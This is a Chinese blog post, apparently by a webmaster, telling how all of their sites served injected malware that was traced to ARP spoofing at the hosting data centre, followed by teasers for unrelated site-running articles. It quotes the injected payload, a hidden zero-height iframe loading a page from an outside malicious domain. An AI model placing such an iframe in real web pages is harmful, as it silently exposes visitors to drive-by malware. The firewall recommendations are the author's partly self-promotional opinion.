服务器所有网站全部挂马,惊心动魄3个小时!

所属分类: 网站运营 / 建站经验 阅读数: 111
收藏 0 赞 0 分享

昨天晚上11点多了。正要睡觉,突然一个网友电话过来了。说网页吧出问题,被挂马了。我一听吓了一大跳!马上起床!

我进入网页吧一访问,真的挂马了,全部网页都有马出现<iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0></iframe> ,然后马上登陆服务器,看源代码,晕了。没有发现有挂马的痕迹.为了怕影响网页吧的用户,先把网页吧这个网站停了.

马上问QQ上的几个做服务器的高手朋友,发现全部网页挂了个马,但是我打开网页看源文件却没有,怎么回事情?后来知道网页里没有 访问有马,说明机房内有ARP攻击,装 360安全卫士 有ARP防火墙 !

没管了.马上安装360,一提示,果然是ARP攻击,然后打开网页吧访问,郁闷.还是有木马.马上关闭.这里我要说一句,360的ARP简直就是垃圾,基本没用的。千万别用。用和没用是一样的!不过查出了ARP攻击的人的网卡地址.

然后半夜联系机房,告诉他们APR攻击的网卡,没用.那机房的说是新技术,不会查IP.不懂,要明天.我超郁闷!

没办法自己继续.继续网上找软件,找到了金山arp防火墙,需要的可以去网页吧下。如果你也被攻击的话。一安装,然后打开.没问题了。完全防御!最重要的是这个工具免费啊。

朋友总结:这个ARP攻击 不是代码的问题 是服务器输出后,经过网关的时候被加了代码 所以网页里是没有代码的 是被别的机器冒充了网关 转发修改了数据!

终于解决问题了,一看表凌晨2点30了.一起3个小时!惊心动魄啊!

如果站长你的站被挂马了,而在源代码里没有发现木马,你就应该怀疑是不是ARP攻击了。最直接的办法是告诉机房,要他们拨攻击的人的线.第二个办法就是安装金山arp防火墙!

金山arp防火墙下载: http://www./ruanjian/anquan/200806/6616.html
(转文章的朋友这个金山arp防火墙下载的连接别去掉了,因为很多人都需要这个软件,第二我打字也不容易,算是给我点点流量吧)

更多精彩内容其他人还在看

网站分析工具 通过流量特点来分析网站

使用一些网站分析工具的时候会发现一般报表会被分成三大模块:用户访问、内容浏览和流量来源。
收藏 0 赞 0 分享

提高博客阅读体验的六个方法说明

博客的阅读体验有很多方面,如果您要建立一个受欢迎的博客,那么,你可能要善待你的读者,提高阅读体验,这样会提高他们再次访问你博客的机会,让他们成为你的博客或网站的常客之一,当然你的网站如果可以注册的话,还可以成为你的注册用户之一,下面我就提供较为实用的
收藏 0 赞 0 分享

让网站上的Adsense广告匹配的更加精准的方法

大家都知道做AdSense 广告的话,网站内容与广告内容匹配程度是很关键的,而Google广告内容又是以网页本身的关键词所觉得,那么如何让网页中出现匹配度最高的Adsense 广告呢?
收藏 0 赞 0 分享

Favicon 在线生成器工具小结

favicon 就是出现在浏览器地址栏左侧的那个小图标。所谓favicon,即Favorites Icon的缩写,中文名称是网站头像,顾名思义,便是其可以让浏览器的收藏夹中除显示相应的标题外,还以图标的方式区别不同的网站。
收藏 0 赞 0 分享

网站备案注销方法 关于网站备案问题的解答

关于网站备案问题的解答 如何注销网站备案
收藏 0 赞 0 分享

一家大型行业网站的编辑的职场真实经历分享

想了很久,终于把干了8个月的网络编辑工作给辞掉了。如今静下心来,把8个月来的思绪给缕一下,也给向往这个职业的朋友们些参考。
收藏 0 赞 0 分享

转化率最高的10个网站的经验分享

之前分享过如何提升网站转化率之:谷歌9条和AIDAS模型,这篇文章直接提到了国外网站转化率最高的10个网站他们是如何有效提升转化率的
收藏 0 赞 0 分享

地方门户型网站运营与发展经验的几点总结

地方门户网站获得发展,还需要和当地的实际情况结合起来,不断的尝试和多方的合作,这样就可以在当地将网站打开知名度,同时使门户网站的营运获得很大的发展。
收藏 0 赞 0 分享

地方类网站的建立(从零起步)

只是个人见解和参考前辈的经验,希望对你有所帮助,难免有错误观点和见解,请您及时告知与我,共同成长,共同进步。最后分享一句话:“认准了,就去做;不跟风,不动摇”。
收藏 0 赞 0 分享

博客网站的运营和推广四步基本经验

网站运营经验:博客网站的运营和推广四步走.
收藏 0 赞 0 分享
查看更多